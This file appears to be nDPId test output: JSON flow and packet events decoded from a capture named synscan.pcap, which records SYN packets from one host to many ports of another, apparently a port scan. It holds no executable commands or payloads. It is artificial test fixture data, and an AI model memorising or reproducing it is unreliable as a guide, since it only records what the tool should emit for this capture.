+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1695,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1695,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1685,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsj\/QAADMGhX6sEAAIQA2GNIzSGvXdUoMYAAAAAGACEAANmgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1696,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25735,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1696,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1686,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsDT8AACsGEDSsEAAIQA2GNIzSZIfdUoMYAAAAAGACEADEBwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1697,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6969,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1697,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1687,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsrMsAADQGZ6esEAAIQA2GNIzSGzndUoMYAAAAAGACBAAZVgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1698,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1698,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1688,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsXC4AACkGw0SsEAAIQA2GNIzSC7vdUoMYAAAAAGACCAAk1AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1699,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1699,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1689,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsTDIAADEGy0CsEAAIQA2GNIzSC8PdUoMYAAAAAGACCAAkzAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1700,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1700,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1690,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsR\/MAADsGxX+sEAAIQA2GNIzSw1LdUoMYAAAAAGACEABlPAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1701,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1701,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1691,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAskHEAACwGjAGsEAAIQA2GNIzSJw7dUoMYAAAAAGACBAANgQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1702,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1702,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1692,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAsPLkAAC0G3rmsEAAIQA2GNIzSD57dUoMYAAAAAGACCAAg8QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1703,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1703,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1693,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAsvIoAADQGV+isEAAIQA2GNIzSB9bdUoMYAAAAAGACBAAsuQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1704,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1704,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1694,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAso+IAADgGbJCsEAAIQA2GNIzSBDjdUoMYAAAAAGACBAAwVwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1705,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1705,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1695,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/0IAACwGHTCsEAAIQA2GNIzSF3bdUoMYAAAAAGACBAAdGQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1706,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1706,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1696,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAsVSwAADEGwkasEAAIQA2GNIzSC73dUoMYAAAAAGACCAAk0gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1707,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1707,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1697,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAsfrsAADsGjresEAAIQA2GNIzSFgHdUoMYAAAAAGACEAASjgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1708,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1708,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1698,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAs3MMAACkGQq+sEAAIQA2GNIzSHOrdUoMYAAAAAGACCAATpQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1709,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1709,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1699,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAslgAAAC4GhHKsEAAIQA2GNIzSEOHdUoMYAAAAAGACDAAbrgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1710,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061003,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5859,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1710,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1700,"flow_packet_id":1,"flow_last_seen":1278275061003,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061003,"pkt":"ACYLMQczACWzv5HuCABFAAAsAEUAADYGEi6sEAAIQA2GNIzTFuPdU4MZAAAAAGACDAAVqQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1711,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061003,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1711,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1701,"flow_packet_id":1,"flow_last_seen":1278275061003,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061003,"pkt":"ACYLMQczACWzv5HuCABFAAAsKngAACUG+PqsEAAIQA2GNIzTACHdU4MZAAAAAGACCAAwawAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1712,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1712,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1702,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAswesAADIGVIesEAAIQA2GNIzTApzdU4MZAAAAAGACDAAp8AAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1713,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1713,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1703,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsb6EAADgGoNGsEAAIQA2GNIzTSizdU4MZAAAAAGACBADqXwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1714,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1714,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1704,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsT8MAACoGzq+sEAAIQA2GNIzTBL3dU4MZAAAAAGACDAAnzwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1715,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1715,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1705,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsp3EAADEGcAGsEAAIQA2GNIzTCDndU4MZAAAAAGACCAAoUwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1716,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1716,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1706,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsVcwAACoGyKasEAAIQA2GNIzTIyjdU4MZAAAAAGACDAAJZAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1717,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1717,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1707,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsoF8AADMGdROsEAAIQA2GNIzTAKHdU4MZAAAAAGACEAAn6wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1718,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9535,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1718,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1708,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsIgcAADcG72usEAAIQA2GNIzTJT\/dU4MZAAAAAGACEAADTQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1719,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 